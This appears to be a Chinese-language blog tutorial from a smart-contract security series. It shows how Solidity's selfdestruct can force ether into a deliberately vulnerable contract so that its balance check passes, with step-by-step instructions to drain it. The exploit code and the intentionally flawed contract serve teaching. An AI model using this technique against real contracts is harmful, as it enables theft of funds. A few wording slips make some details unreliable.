区块链骇客第二讲:被禁用的自毁函数

1. What?

在区块链中删除代码的唯一方法是该地址的合约执行自毁操作,即 selfdestruct()。

存储在该地址的剩余以太被发送到指定目标,然后从该状态中删除存储和代码。

1
2
3
4
5
6
7
8
9
10
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract Example{
    constructor(address payable to) payable {
        // redirect all the `msg.value` to `to` when selfdestructing
        selfdestruct(to);
    }
}

如上例所示,这是一个包含着selfdestruct()函数的简单合约。

constructor 构造器,payable关键词使得该合约在被创建时就能够接收以太

selfdestruct()自毁函数,合约在创建之时,就直接自毁,删除代码,并且将合约本身的余额强制发送到to这个地址上;

说的简单点,自毁函数只有两个核心作用

  1. 它使合约变为无效,有效地删除该地址的字节码。
  2. 它把合约的所有资金强制发送到目标地址。

2. Why?

或许你对我上一部分举出的合约例子可能会感到疑惑,为什么不说得简洁一些呢?

那到底为什么要禁用自毁函数呢?

答案就在这个例子中!

这是一个具有攻击性的自毁合约;

刚刚说到,当调用自毁函数之时,合约余额将会被强制发送指定的地址上。

注意强制这一个词,这意味着接收地址合约无论是否拥有接收以太的函数,它都无法拒绝这笔余额打进来。

而这正是自毁函数被禁用的原因

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

//被攻击合约
contract Attacked {
    //部署时传入0.08 ether
    constructor() payable {}

    //获取合约余额
    function getBalance() public view returns (uint256 balance) {
        balance = address(this).balance;
        return balance;
    }

    //提款函数
    function withdraw(uint256 amount) external {
        require(address(this).balance > 0.1 ether);
        require(amount <= address(this).balance);
        payable(msg.sender).transfer(address(this).balance);
    }
}

如上例所示:这是一个被攻击的合约

那么问题来了,如何使用上面所学知识,将合约中的0.08 ether装进自己的钱包?

3. Try !

让我们研究一下此合约

  1. receive()、以及任何实现payable的function,说明合约无法正常接收以太交易;
  2. withdraw()是外部函数,并且最关键的限制条件是使合约余额大于0.1 ether;

结论

只要我们能够有办法将0.021个甚至更少的ether打进该合约,让调用withdraw()函数满足条件,就可以成功赚到0.08个ether。

讲到这里,相信大家已经悟了,摩拳擦掌准备大展身手了!

实践

  • 被攻击合约本身就有0.08 ether

  • 部署攻击合约,传入大于0.02个ether

  • 查看合约余额是否大于0.1 ether

  • 调用withdraw()函数提取合约所有余额,大功告成!

更多区块链技术干货请关注

岚链技术论坛

77Brother的技术小栈(个人博客)

区块链骇客
#合约安全审计
区块链骇客第二讲:被禁用的自毁函数
http://nangbowan.github.io/2022/11/01/区块链骇客第二讲-被禁用的自毁函数/
作者
Science_Jun
发布于
2022年11月1日
许可协议